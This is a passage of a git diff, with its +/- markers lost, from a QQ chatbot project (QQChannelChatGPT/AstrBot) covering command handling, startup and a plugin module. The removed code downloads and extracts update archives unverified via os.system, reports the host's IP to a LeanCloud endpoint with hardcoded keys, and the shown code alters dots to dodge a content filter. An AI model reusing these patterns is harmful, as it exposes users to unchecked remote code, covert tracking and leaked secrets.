cache_prompt = get_prompts_by_cache_list(cache_data_list)
|
||||
|
||||
# 添加新条目进入缓存的prompt
|
||||
if command_type == 1:
|
||||
level = 'max'
|
||||
else:
|
||||
level = 'normal'
|
||||
if len(cache_data_list) > 0:
|
||||
single_record = {
|
||||
"prompt": f'Human: {qq_msg}\nAI: {chatgpt_res}\n',
|
||||
"usage_tokens": current_usage_tokens,
|
||||
"single_tokens": current_usage_tokens - int(cache_data_list[-1]['usage_tokens']),
|
||||
"level": level
|
||||
}
|
||||
else:
|
||||
single_record = {
|
||||
"prompt": f'Human: {qq_msg}\nAI: {chatgpt_res}\n',
|
||||
"usage_tokens": current_usage_tokens,
|
||||
"single_tokens": current_usage_tokens,
|
||||
"level": level
|
||||
}
|
||||
cache_data_list.append(single_record)
|
||||
session_dict[session_id] = cache_data_list
|
||||
|
||||
elif provider == REV_CHATGPT:
|
||||
try:
|
||||
chatgpt_res = "[Rev]"+str(get_rev_ChatGPT_response(qq_msg))
|
||||
except BaseException as e:
|
||||
print("[System-Err] Rev ChatGPT API错误。原因如下:\n"+str(e))
|
||||
send_qq_msg(message, f"Rev ChatGPT API错误。原因如下:\n{str(e)} \n前往官方频道反馈~")
|
||||
return
|
||||
|
||||
    # send the reply back to QQ
    try:
        # break up "." so the QQ channel content filter is less likely to drop the message
        gap_chatgpt_res = chatgpt_res.replace(".", " . ")
        if '```' in gap_chatgpt_res:
            # strip code fences before sending
            gap_chatgpt_res = gap_chatgpt_res.replace('```', "")
        # mask unfit words
        for i in uw.unfit_words:
            if i in gap_chatgpt_res:
                gap_chatgpt_res = gap_chatgpt_res.replace(i, "***")
        # send the message
        send_qq_msg(message, ''+gap_chatgpt_res)
    except BaseException as e:
        print("QQ频道API错误: \n"+str(e))
        f_res = ""
        for t in chatgpt_res:
            f_res += t + ' '
        try:
            send_qq_msg(message, ''+f_res)
            # send(message, f"QQ频道API错误:{str(e)}\n下面是格式化后的回答:\n{f_res}")
        except:
            # if that still fails, strip URLs and replace dots
            f_res = re.sub(r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '', f_res, flags=re.MULTILINE)
            f_res = f_res.replace(".", "·")
            send_qq_msg(message, ''+f_res)
            # send(message, f"QQ频道API错误:{str(e)}\n下面是格式化后的回答:\n{f_res}")

    # write to the log file
    logf.write("[GPT] "+ str(chatgpt_res)+'\n')
    logf.flush()

|
||||
|
||||
'''
|
||||
获取统计信息
|
||||
'''
|
||||
def get_stat():
|
||||
try:
|
||||
f = open(abs_path+"configs/stat", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
guild_count = 0
|
||||
guild_msg_count = 0
|
||||
guild_direct_msg_count = 0
|
||||
|
||||
for k,v in fjson.items():
|
||||
guild_count += 1
|
||||
guild_msg_count += v['count']
|
||||
guild_direct_msg_count += v['direct_count']
|
||||
|
||||
session_count = 0
|
||||
|
||||
f = open(abs_path+"configs/session", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
for k,v in fjson.items():
|
||||
session_count += 1
|
||||
return guild_count, guild_msg_count, guild_direct_msg_count, session_count
|
||||
except:
|
||||
return -1, -1, -1, -1
|
||||
|
||||
'''
|
||||
指令处理
|
||||
'''
|
||||
def command_oper(qq_msg, message, session_id, name, user_id, user_name, at):
|
||||
go = False # 是否处理完指令后继续执行msg_oper后面的代码
|
||||
msg = ''
|
||||
global session_dict, now_personality, provider
|
||||
|
||||
# 指令返回值,/set设置人格是1
|
||||
type = -1
|
||||
|
||||
# 指令控制
|
||||
if qq_msg == "/reset" or qq_msg == "/重置":
|
||||
msg = ''
|
||||
session_dict[session_id] = []
|
||||
if at:
|
||||
msg = f"{name}(id: {session_id})的历史记录重置成功\n\n{announcement}"
|
||||
else:
|
||||
msg = f"你的历史记录重置成功"
|
||||
|
||||
if qq_msg[:4] == "/his":
|
||||
if provider == REV_CHATGPT:
|
||||
msg = "[QQChannelChatGPT]当前使用的语言模型提供商是Rev_ChatGPT, 不支持查看历史记录"
|
||||
return msg, go, type
|
||||
#分页,每页5条
|
||||
msg = ''
|
||||
size_per_page = 3
|
||||
page = 1
|
||||
if qq_msg[5:]:
|
||||
page = int(qq_msg[5:])
|
||||
# 检查是否有过历史记录
|
||||
if session_id not in session_dict:
    msg = f"{name} 的历史记录为空"
    return msg, go, type
|
||||
l = session_dict[session_id]
|
||||
max_page = len(l)//size_per_page + 1 if len(l)%size_per_page != 0 else len(l)//size_per_page
|
||||
p = get_prompts_by_cache_list(session_dict[session_id], divide=True, paging=True, size=size_per_page, page=page)
|
||||
if at:
|
||||
msg=f"{name}的历史记录如下:\n{p}\n第{page}页 | 共{max_page}页\n*输入/his 2跳转到第2页"
|
||||
else:
|
||||
msg=f"历史记录如下:\n{p}\n第{page}页 | 共{max_page}页\n*输入/his 2跳转到第2页\n\n{announcement}"
|
||||
|
||||
if qq_msg == "/token":
|
||||
if provider == REV_CHATGPT:
|
||||
msg = "[QQChannelChatGPT]当前使用的语言模型提供商是Rev_ChatGPT, 不支持使用此指令"
|
||||
return msg, go, type
|
||||
msg = ''
|
||||
if at:
|
||||
msg=f"{name} 会话的token数: {get_user_usage_tokens(session_dict[session_id])}\n系统最大缓存token数: {max_tokens}"
|
||||
else:
|
||||
msg=f"会话的token数: {get_user_usage_tokens(session_dict[session_id])}\n系统最大缓存token数: {max_tokens}"
|
||||
|
||||
if qq_msg == '/gpt':
|
||||
if provider == REV_CHATGPT:
|
||||
msg = "[QQChannelChatGPT]当前使用的语言模型提供商是Rev_ChatGPT, 不支持使用此指令"
|
||||
return msg, go, type
|
||||
global gpt_config
|
||||
msg=f"OpenAI GPT配置:\n {gpt_config}"
|
||||
|
||||
if qq_msg == "/status" or qq_msg == "/状态":
|
||||
|
||||
chatgpt_cfg_str = ""
|
||||
key_stat = chatgpt.get_key_stat()
|
||||
key_list = chatgpt.get_key_list()
|
||||
index = 1
|
||||
max = 900000
|
||||
gg_count = 0
|
||||
total = 0
|
||||
tag = ''
|
||||
for key in key_stat.keys():
|
||||
sponsor = ''
|
||||
total += key_stat[key]['used']
|
||||
if key_stat[key]['exceed']:
|
||||
gg_count += 1
|
||||
continue
|
||||
if 'sponsor' in key_stat[key]:
|
||||
sponsor = key_stat[key]['sponsor']
|
||||
chatgpt_cfg_str += f" |-{index}: {key_stat[key]['used']}/{max} {sponsor}赞助{tag}\n"
|
||||
index += 1
|
||||
msg = f"⭐使用情况({str(gg_count)}个已用):\n{chatgpt_cfg_str}⏰全频道已用{total}tokens\n{announcement}"
|
||||
if qq_msg == "/count" or qq_msg == "/统计":
|
||||
guild_count, guild_msg_count, guild_direct_msg_count, session_count = get_stat()
|
||||
msg = f"当前会话数: {len(session_dict)}\n共有频道数: {guild_count} \n共有消息数: {guild_msg_count}\n私信数: {guild_direct_msg_count}\n历史会话数: {session_count}"
|
||||
|
||||
if qq_msg == "/help":
|
||||
ol_version = 'Unknown'
|
||||
try:
|
||||
global version
|
||||
res = requests.get("https://soulter.top/channelbot/update.json")
|
||||
res_obj = json.loads(res.text)
|
||||
ol_version = res_obj['version']
|
||||
except BaseException:
|
||||
pass
|
||||
msg = f"[Github项目名: QQChannelChatGPT,有问题请前往提交issue,欢迎Star此项目~]\n\n当前版本:{version}\n最新版本:{str(ol_version)}\n请及时更新!\n\n指令面板:\n/status 查看机器人key状态\n/count 查看机器人统计信息\n/reset 重置会话\n/his 查看历史记录\n/token 查看会话token数\n/help 查看帮助\n/set 人格指令菜单\n/key 动态添加key"
|
||||
|
||||
if qq_msg[:4] == "/key":
|
||||
if len(qq_msg) == 4:
    msg = "感谢您赞助key,key为官方API使用,请以以下格式赞助:\n/key xxxxx"
    return msg, go, type
|
||||
key = qq_msg[5:]
|
||||
send_qq_msg(message, "收到!正在核验...")
|
||||
if chatgpt.check_key(key):
|
||||
msg = f"*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。\n该Key被验证为有效。感谢{user_name}赞助~"
|
||||
chatgpt.append_key(key, user_name)
|
||||
else:
|
||||
msg = "该Key被验证为无效。也许是输入错误了,或者重试。"
|
||||
|
||||
if qq_msg[:6] == "/unset":
|
||||
now_personality = {}
|
||||
msg = "已清除人格"
|
||||
|
||||
if qq_msg[:4] == "/set":
|
||||
if len(qq_msg) == 4:
|
||||
np = '无'
|
||||
if "name" in now_personality:
|
||||
np=now_personality["name"]
|
||||
msg = f"【由Github项目QQChannelChatGPT支持】\n\n【人格文本由PlexPt开源项目awesome-chatgpt-prompts-zh提供】\n\n这个是人格设置指令。\n设置人格: \n/set 人格名。例如/set 编剧\n人格列表: /set list\n人格详细信息: /set view 人格名\n自定义人格: /set 人格文本\n清除人格: /unset\n【当前人格】: {np}"
|
||||
elif qq_msg[5:] == "list":
|
||||
per_dict = personalities
|
||||
msg = "人格列表:\n"
|
||||
for key in per_dict.keys():
|
||||
msg += f" |-{key}\n"
|
||||
msg += '\n\n*输入/set view 人格名查看人格详细信息'
|
||||
msg += '\n\n*不定时更新人格库,请及时更新本项目。'
|
||||
elif qq_msg[5:9] == "view":
|
||||
ps = qq_msg[10:]
|
||||
ps = ps.strip()
|
||||
per_dict = personalities
|
||||
if ps in per_dict:
|
||||
msg = f"人格{ps}的详细信息:\n"
|
||||
msg += f"{per_dict[ps]}\n"
|
||||
else:
|
||||
msg = f"人格{ps}不存在"
|
||||
else:
|
||||
ps = qq_msg[5:]
|
||||
ps = ps.strip()
|
||||
per_dict = personalities
|
||||
if ps in per_dict:
|
||||
now_personality = {
|
||||
'name': ps,
|
||||
'prompt': per_dict[ps]
|
||||
}
|
||||
session_dict[session_id] = []
|
||||
msg = f"人格{ps}已设置,请耐心等待机器人回复第一条信息。"
|
||||
go = True
|
||||
type = 1
|
||||
else:
|
||||
msg = f"人格{ps}不存在, 请使用/set list查看人格列表"
|
||||
return msg, go, type
|
||||
main.py (247 lines changed)
@@ -1,175 +1,108 @@
|
||||
|
||||
import os
|
||||
import sys
|
||||
import warnings
|
||||
import traceback
|
||||
import threading
|
||||
import time
|
||||
import asyncio
|
||||
import os, sys
|
||||
import signal
|
||||
import requests,json
|
||||
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Formatter, Logger
|
||||
|
||||
warnings.filterwarnings("ignore")
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
|
||||
def main(loop, event):
|
||||
import cores.qqbot.core as qqBot
|
||||
import yaml
|
||||
logger: Logger = None
|
||||
|
||||
ymlfile = open(abs_path+"configs/config.yaml", 'r', encoding='utf-8')
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
provider = privider_chooser(cfg)
|
||||
print('[System] 当前语言模型提供商: ' + provider)
|
||||
# 执行Bot
|
||||
qqBot.initBot(cfg, provider)
|
||||
logo_tmpl = """
|
||||
___ _______.___________..______ .______ ______ .___________.
|
||||
/ \ / | || _ \ | _ \ / __ \ | |
|
||||
/ ^ \ | (----`---| |----`| |_) | | |_) | | | | | `---| |----`
|
||||
/ /_\ \ \ \ | | | / | _ < | | | | | |
|
||||
/ _____ \ .----) | | | | |\ \----.| |_) | | `--' | | |
|
||||
/__/ \__\ |_______/ |__| | _| `._____||______/ \______/ |__|
|
||||
|
||||
# 语言模型提供商选择器
|
||||
# 目前有:OpenAI官方API、逆向库
|
||||
def privider_chooser(cfg):
|
||||
if 'rev_ChatGPT' in cfg and cfg['rev_ChatGPT']['enable']:
|
||||
return 'rev_chatgpt'
|
||||
else:
|
||||
return 'openai_official'
|
||||
"""
|
||||
|
||||
# 仅支持linux
|
||||
def hot_update(ver):
|
||||
target = 'target.tar'
|
||||
time.sleep(5)
|
||||
while(True):
|
||||
if os.path.exists('version.txt'):
|
||||
version_file = open('version.txt', 'r', encoding='utf-8')
|
||||
vs = version_file.read()
|
||||
version = float(vs)
|
||||
else:
|
||||
version = 0
|
||||
if not os.path.exists(target):
|
||||
version = 0
|
||||
try:
|
||||
res = requests.get("https://soulter.top/channelbot/update.json")
|
||||
res_obj = json.loads(res.text)
|
||||
ol_version = float(res_obj['version'])
|
||||
if ol_version > version:
|
||||
print('发现新版本: ' + str(ol_version))
|
||||
res = requests.get(res_obj['linux-url'], stream=True)
|
||||
filesize = res.headers["Content-Length"]
|
||||
print('文件大小: ' + str(int(filesize) / 1024 / 1024) + 'MB')
|
||||
print('正在更新文件...')
|
||||
chunk_size = 1024
|
||||
times = int(filesize) // chunk_size
|
||||
show = 1 / times
|
||||
show2 = 1 / times
|
||||
start = 1
|
||||
with open(target, "wb") as pyFile:
|
||||
for chunk in res.iter_content(chunk_size=chunk_size):
|
||||
if chunk:
|
||||
pyFile.write(chunk)
|
||||
if start <= times:
|
||||
print(f"\r下载进度: {show:.2%}",end="",flush=True)
|
||||
start += 1
|
||||
show += show2
|
||||
else:
|
||||
sys.stdout.write(f"下载进度: 100%\n")
|
||||
print('更新完成')
|
||||
print('解压覆盖')
|
||||
os.system(f"tar -zxvf {target}")
|
||||
version = ol_version
|
||||
version_file = open('version.txt', 'w+', encoding='utf-8')
|
||||
version_file.write(str(res_obj['version']))
|
||||
version_file.flush()
|
||||
version_file.close()
|
||||
def make_necessary_dirs():
|
||||
'''
|
||||
创建必要的目录。
|
||||
'''
|
||||
os.makedirs("data/config", exist_ok=True)
|
||||
os.makedirs("temp", exist_ok=True)
|
||||
|
||||
try:
|
||||
update_version(version)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
|
||||
print('自启动')
|
||||
def update_dept():
|
||||
'''
|
||||
更新依赖库。
|
||||
'''
|
||||
# 获取 Python 可执行文件路径
|
||||
py = sys.executable
|
||||
os.execl(py, py, *sys.argv)
|
||||
time.sleep(60*20)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
print("upd出现异常, 请联系QQ905617992")
|
||||
time.sleep(60*20)
|
||||
# 更新依赖库
|
||||
mirror = "https://mirrors.aliyun.com/pypi/simple/"
|
||||
os.system(f"{py} -m pip install -r requirements.txt -i {mirror}")
|
||||
|
||||
def update_version(ver):
|
||||
if not os.path.exists('update_record'):
|
||||
object_id = ''
|
||||
else:
|
||||
object_id = open("update_record", 'r', encoding='utf-8').read()
|
||||
addr = 'unknown'
|
||||
def main():
|
||||
try:
|
||||
addr = requests.get('http://myip.ipip.net', timeout=5).text
|
||||
except BaseException:
|
||||
pass
|
||||
try:
|
||||
ts = str(time.time())
|
||||
# md = hashlib.md5((ts+'QAZ1rQLY1ZufHrZlpuUiNff7').encode())
|
||||
headers = {
|
||||
'X-LC-Id': 'UqfXTWW15nB7iMT0OHvYrDFb-gzGzoHsz',
|
||||
'X-LC-Key': 'QAZ1rQLY1ZufHrZlpuUiNff7',
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
d = {"data": {'version':'win-hot-update'+str(ver), 'addr': addr}}
|
||||
d = json.dumps(d).encode("utf-8")
|
||||
res = requests.put(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/version_record/{object_id}', headers = headers, data = d)
|
||||
if json.loads(res.text)['code'] == 1:
|
||||
res = requests.post(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/version_record', headers = headers, data = d)
|
||||
object_id = json.loads(res.text)['objectId']
|
||||
object_id_file = open("update_record", 'w+', encoding='utf-8')
|
||||
object_id_file.write(str(object_id))
|
||||
object_id_file.flush()
|
||||
object_id_file.close()
|
||||
import botpy, logging
|
||||
import astrbot.core as bot_core
|
||||
# delete qqbotpy's logger
|
||||
for handler in logging.root.handlers[:]:
|
||||
logging.root.removeHandler(handler)
|
||||
except ImportError as import_error:
|
||||
logger.error(import_error)
|
||||
logger.error("检测到一些依赖库没有安装。由于兼容性问题,AstrBot 此版本将不会自动为您安装依赖库。请您先自行安装,然后重试。")
|
||||
logger.info("如何安装?如果:")
|
||||
logger.info("- Windows 启动器部署且使用启动器下载了 Python的:在 launcher.exe 所在目录下的地址框输入 powershell,然后执行 .\python\python.exe -m pip install .\AstrBot\requirements.txt")
|
||||
logger.info("- Windows 启动器部署且使用自己之前下载的 Python的:在 launcher.exe 所在目录下的地址框输入 powershell,然后执行 python -m pip install .\AstrBot\requirements.txt")
|
||||
logger.info("- 自行 clone 源码部署的:python -m pip install -r requirements.txt")
|
||||
logger.info("- 如果还不会,加群 322154837 ")
|
||||
input("按任意键退出。")
|
||||
exit()
|
||||
except FileNotFoundError as file_not_found:
|
||||
logger.error(file_not_found)
|
||||
input("配置文件不存在,请检查是否已经下载配置文件。")
|
||||
exit()
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
logger.error(traceback.format_exc())
|
||||
input("未知错误。")
|
||||
exit()
|
||||
|
||||
make_necessary_dirs()
|
||||
|
||||
# 启动主程序(cores/qqbot/core.py)
|
||||
bot_core.init()
|
||||
|
||||
|
||||
def check_env():
|
||||
if not (sys.version_info.major == 3 and sys.version_info.minor >= 8):
|
||||
print("请使用Python3.8运行本项目")
|
||||
input("按任意键退出...")
|
||||
if not (sys.version_info.major == 3 and sys.version_info.minor >= 9):
|
||||
logger.error("请使用 Python3.9+ 运行本项目。按任意键退出。")
|
||||
input("")
|
||||
exit()
|
||||
try:
|
||||
import openai
|
||||
import botpy
|
||||
import yaml
|
||||
except Exception as e:
|
||||
# print(e)
|
||||
try:
|
||||
print("安装依赖库中...")
|
||||
os.system("pip3 install openai")
|
||||
os.system("pip3 install qq-botpy")
|
||||
os.system("pip3 install pyyaml")
|
||||
print("安装依赖库完毕...")
|
||||
except BaseException:
|
||||
print("\n安装第三方库异常.请自行安装或者联系QQ905617992.")
|
||||
|
||||
# 检查key
|
||||
with open(abs_path+"configs/config.yaml", 'r', encoding='utf-8') as ymlfile:
|
||||
import yaml
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
if cfg['openai']['key'] == '' or cfg['openai']['key'] == None:
|
||||
print("请先在configs/config.yaml下添加一个可用的OpenAI Key。详情请前往https://beta.openai.com/account/api-keys")
|
||||
if cfg['qqbot']['appid'] == '' or cfg['qqbot']['token'] == '' or cfg['qqbot']['appid'] == None or cfg['qqbot']['token'] == None:
|
||||
print("请先在configs/config.yaml下完善appid和token令牌(在https://q.qq.com/上注册一个QQ机器人即可获得)")
|
||||
|
||||
def get_platform():
|
||||
import platform
|
||||
sys_platform = platform.platform().lower()
|
||||
if "windows" in sys_platform:
|
||||
return "win"
|
||||
elif "macos" in sys_platform:
|
||||
return "mac"
|
||||
elif "linux" in sys_platform:
|
||||
return "linux"
|
||||
else:
|
||||
print("other")
|
||||
|
||||
if __name__ == "__main__":
|
||||
global pid
|
||||
pid = os.getpid()
|
||||
global ma_type
|
||||
print("程序PID:"+str(pid))
|
||||
check_env()
|
||||
bot_event = threading.Event()
|
||||
loop = asyncio.get_event_loop()
|
||||
ma_type = get_platform()
|
||||
if ma_type == 'linux':
|
||||
threading.Thread(target=hot_update).start()
|
||||
logger = LogManager.GetLogger(
|
||||
log_name='astrbot-core',
|
||||
out_to_console=True,
|
||||
custom_formatter=Formatter('[%(asctime)s| %(name)s - %(levelname)s|%(filename)s:%(lineno)d]: %(message)s', datefmt="%H:%M:%S")
|
||||
)
|
||||
logger.info(logo_tmpl)
|
||||
|
||||
main(loop, bot_event)
|
||||
# 设置代理
|
||||
from util.cmd_config import CmdConfig
|
||||
cc = CmdConfig()
|
||||
http_proxy = cc.get("http_proxy")
|
||||
https_proxy = cc.get("https_proxy")
|
||||
logger.info(f"使用代理: {http_proxy}, {https_proxy}")
|
||||
if http_proxy:
|
||||
os.environ['HTTP_PROXY'] = http_proxy
|
||||
if https_proxy:
|
||||
os.environ['HTTPS_PROXY'] = https_proxy
|
||||
os.environ['NO_PROXY'] = 'https://api.sgroup.qq.com'
|
||||
|
||||
update_dept()
|
||||
check_env()
|
||||
t = threading.Thread(target=main, daemon=True)
|
||||
t.start()
|
||||
try:
|
||||
t.join()
|
||||
except KeyboardInterrupt as e:
|
||||
logger.info("退出 AstrBot。")
|
||||
exit()
|
||||
|
||||
model/command/command.py (new file, 321 lines)
@@ -0,0 +1,321 @@
|
||||
import json
|
||||
import inspect
|
||||
import aiohttp
|
||||
import asyncio
|
||||
|
||||
import util.plugin_util as putil
|
||||
import util.updator
|
||||
|
||||
from nakuru.entities.components import (
|
||||
Image
|
||||
)
|
||||
from util import general_utils as gu
|
||||
from model.provider.provider import Provider
|
||||
from util.cmd_config import CmdConfig as cc
|
||||
from type.message import *
|
||||
from type.types import GlobalObject
|
||||
from type.command import *
|
||||
from type.plugin import *
|
||||
from type.register import *
|
||||
|
||||
from typing import List
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
PLATFORM_QQCHAN = 'qqchan'
|
||||
PLATFORM_GOCQ = 'gocq'
|
||||
|
||||
# 指令功能的基类,通用的(不区分语言模型)的指令就在这实现
|
||||
|
||||
|
||||
class Command:
|
||||
def __init__(self, provider: Provider, global_object: GlobalObject = None):
|
||||
self.provider = provider
|
||||
self.global_object = global_object
|
||||
|
||||
async def check_command(self,
|
||||
message,
|
||||
session_id: str,
|
||||
role: str,
|
||||
platform: RegisteredPlatform,
|
||||
message_obj):
|
||||
self.platform = platform
|
||||
# 插件
|
||||
cached_plugins = self.global_object.cached_plugins
|
||||
# 将消息封装成 AstrMessageEvent 对象
|
||||
ame = AstrMessageEvent(
|
||||
message_str=message,
|
||||
message_obj=message_obj,
|
||||
platform=platform,
|
||||
role=role,
|
||||
context=self.global_object,
|
||||
session_id=session_id
|
||||
)
|
||||
# 从已启动的插件中查找是否有匹配的指令
|
||||
for plugin in cached_plugins:
|
||||
# 过滤掉平台类插件
|
||||
if plugin.metadata.plugin_type == PluginType.PLATFORM:
|
||||
continue
|
||||
try:
|
||||
if inspect.iscoroutinefunction(plugin.plugin_instance.run):
|
||||
result = await plugin.plugin_instance.run(ame)
|
||||
else:
|
||||
result = await asyncio.to_thread(plugin.plugin_instance.run, ame)
|
||||
if isinstance(result, CommandResult):
|
||||
hit = result.hit
|
||||
res = result._result_tuple()
|
||||
elif isinstance(result, tuple):
|
||||
hit = result[0]
|
||||
res = result[1]
|
||||
else:
|
||||
raise TypeError("插件返回值格式错误。")
|
||||
if hit:
|
||||
logger.debug("hit plugin: " + plugin.metadata.plugin_name)
|
||||
return True, res
|
||||
except TypeError as e:
|
||||
# 参数不匹配,尝试使用旧的参数方案
|
||||
try:
|
||||
if inspect.iscoroutinefunction(plugin.plugin_instance.run):
|
||||
hit, res = await plugin.plugin_instance.run(message, role, platform, message_obj, self.global_object.platform_qq)
|
||||
else:
|
||||
hit, res = await asyncio.to_thread(plugin.plugin_instance.run, message, role, platform, message_obj, self.global_object.platform_qq)
|
||||
if hit:
|
||||
return True, res
|
||||
except BaseException as e:
|
||||
logger.error(
|
||||
f"{plugin.metadata.plugin_name} 插件异常,原因: {str(e)}\n如果你没有相关装插件的想法, 请直接忽略此报错, 不影响其他功能的运行。")
|
||||
except BaseException as e:
|
||||
logger.error(
|
||||
f"{plugin.metadata.plugin_name} 插件异常,原因: {str(e)}\n如果你没有相关装插件的想法, 请直接忽略此报错, 不影响其他功能的运行。")
|
||||
|
||||
if self.command_start_with(message, "nick"):
|
||||
return True, self.set_nick(message, platform, role)
|
||||
if self.command_start_with(message, "plugin"):
|
||||
return True, self.plugin_oper(message, role, cached_plugins, platform)
|
||||
if self.command_start_with(message, "myid") or self.command_start_with(message, "!myid"):
|
||||
return True, self.get_my_id(message_obj, platform)
|
||||
if self.command_start_with(message, "web"): # 网页搜索
|
||||
return True, self.web_search(message)
|
||||
if self.command_start_with(message, "update"):
|
||||
return True, self.update(message, role)
|
||||
if not self.provider and self.command_start_with(message, "help"):
|
||||
return True, await self.help()
|
||||
|
||||
return False, None
|
||||
|
||||
def web_search(self, message):
|
||||
l = message.split(' ')
|
||||
if len(l) == 1:
|
||||
return True, f"网页搜索功能当前状态: {self.global_object.web_search}", "web"
|
||||
elif l[1] == 'on':
|
||||
self.global_object.web_search = True
|
||||
return True, "已开启网页搜索", "web"
|
||||
elif l[1] == 'off':
|
||||
self.global_object.web_search = False
|
||||
return True, "已关闭网页搜索", "web"
|
||||
|
||||
def get_my_id(self, message_obj, platform):
|
||||
try:
|
||||
user_id = str(message_obj.user_id)
|
||||
return True, f"你在此平台上的ID:{user_id}", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"在{platform}上获取你的ID失败,原因: {str(e)}", "plugin"
|
||||
|
||||
def get_new_conf(self, message, role):
|
||||
if role != "admin":
|
||||
return False, f"你的身份组{role}没有权限使用此指令。", "newconf"
|
||||
l = message.split(" ")
|
||||
if len(l) <= 1:
|
||||
obj = cc.get_all()
|
||||
p = gu.create_text_image("【cmd_config.json】", json.dumps(
|
||||
obj, indent=4, ensure_ascii=False))
|
||||
return True, [Image.fromFileSystem(p)], "newconf"
|
||||
|
||||
'''
|
||||
插件指令
|
||||
'''
|
||||
|
||||
def plugin_oper(self, message: str, role: str, cached_plugins: List[RegisteredPlugin], platform: str):
|
||||
l = message.split(" ")
|
||||
if len(l) < 2:
|
||||
p = gu.create_text_image(
|
||||
"【插件指令面板】", "安装插件: \nplugin i 插件Github地址\n卸载插件: \nplugin d 插件名 \n重载插件: \nplugin reload\n查看插件列表:\nplugin l\n更新插件: plugin u 插件名\n")
|
||||
return True, [Image.fromFileSystem(p)], "plugin"
|
||||
else:
|
||||
if l[1] == "i":
|
||||
if role != "admin":
|
||||
return False, f"你的身份组{role}没有权限安装插件", "plugin"
|
||||
try:
|
||||
putil.install_plugin(l[2], cached_plugins)
|
||||
return True, "插件拉取并载入成功~", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"拉取插件失败,原因: {str(e)}", "plugin"
|
||||
elif l[1] == "d":
|
||||
if role != "admin":
|
||||
return False, f"你的身份组{role}没有权限删除插件", "plugin"
|
||||
try:
|
||||
putil.uninstall_plugin(l[2], cached_plugins)
|
||||
return True, "插件卸载成功~", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"卸载插件失败,原因: {str(e)}", "plugin"
|
||||
elif l[1] == "u":
|
||||
try:
|
||||
putil.update_plugin(l[2], cached_plugins)
|
||||
return True, "\n更新插件成功!!", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"更新插件失败,原因: {str(e)}。\n建议: 使用 plugin i 指令进行覆盖安装(插件数据可能会丢失)", "plugin"
|
||||
elif l[1] == "l":
|
||||
try:
|
||||
plugin_list_info = ""
|
||||
for plugin in cached_plugins:
|
||||
plugin_list_info += f"{plugin.metadata.plugin_name}: \n名称: {plugin.metadata.plugin_name}\n简介: {plugin.metadata.plugin_desc}\n版本: {plugin.metadata.version}\n作者: {plugin.metadata.author}\n"
|
||||
p = gu.create_text_image(
|
||||
"【已激活插件列表】", plugin_list_info + "\n使用plugin v 插件名 查看插件帮助\n")
|
||||
return True, [Image.fromFileSystem(p)], "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"获取插件列表失败,原因: {str(e)}", "plugin"
|
||||
elif l[1] == "v":
|
||||
try:
|
||||
info = None
|
||||
for i in cached_plugins:
|
||||
if i.metadata.plugin_name == l[2]:
|
||||
info = i.metadata
|
||||
break
|
||||
if info:
|
||||
p = gu.create_text_image(
|
||||
f"【插件信息】", f"名称: {info.plugin_name}\n类型: {info.plugin_type}\n{info.desc}\n版本: {info.version}\n作者: {info.author}")
|
||||
return True, [Image.fromFileSystem(p)], "plugin"
|
||||
else:
|
||||
return False, "未找到该插件", "plugin"
|
||||
except BaseException as e:
|
||||
return False, f"获取插件信息失败,原因: {str(e)}", "plugin"
|
||||
|
||||
'''
|
||||
nick: 存储机器人的昵称
|
||||
'''
|
||||
|
||||
def set_nick(self, message: str, platform: RegisteredPlatform, role: str = "member"):
|
||||
if role != "admin":
|
||||
return True, "你无权使用该指令 :P", "nick"
|
||||
if str(platform) == PLATFORM_GOCQ:
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
return True, "【设置机器人昵称】示例:\n支持多昵称\nnick 昵称1 昵称2 昵称3", "nick"
|
||||
nick = l[1:]
|
||||
cc.put("nick_qq", nick)
|
||||
self.global_object.nick = tuple(nick)
|
||||
return True, f"设置成功!现在你可以叫我这些昵称来提问我啦~", "nick"
|
||||
elif str(platform) == PLATFORM_QQCHAN:
|
||||
nick = message.split(" ")[2]
|
||||
return False, "QQ频道平台不支持为机器人设置昵称。", "nick"
|
||||
|
||||
def general_commands(self):
|
||||
return {
|
||||
"help": "帮助",
|
||||
"keyword": "设置关键词/关键指令回复",
|
||||
"update": "更新项目",
|
||||
"nick": "设置机器人昵称",
|
||||
"plugin": "插件安装、卸载和重载",
|
||||
"web on/off": "LLM 网页搜索能力",
|
||||
}
|
||||
|
||||
async def help_messager(self, commands: dict, platform: str, cached_plugins: List[RegisteredPlugin] = None):
|
||||
try:
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get("https://soulter.top/channelbot/notice.json") as resp:
|
||||
notice = (await resp.json())["notice"]
|
||||
except BaseException as e:
|
||||
notice = ""
|
||||
msg = "# Help Center\n## 指令列表\n"
|
||||
for key, value in commands.items():
|
||||
msg += f"`{key}` - {value}\n"
|
||||
# plugins
|
||||
if cached_plugins != None:
|
||||
plugin_list_info = ""
|
||||
for plugin in cached_plugins:
|
||||
plugin_list_info += f"`{plugin.metadata.plugin_name}` {plugin.metadata.desc}\n"
|
||||
if plugin_list_info.strip() != "":
|
||||
msg += "\n## 插件列表\n> 使用plugin v 插件名 查看插件帮助\n"
|
||||
msg += plugin_list_info
|
||||
msg += notice
|
||||
|
||||
try:
|
||||
p = gu.create_markdown_image(msg)
|
||||
return [Image.fromFileSystem(p),]
|
||||
except BaseException as e:
|
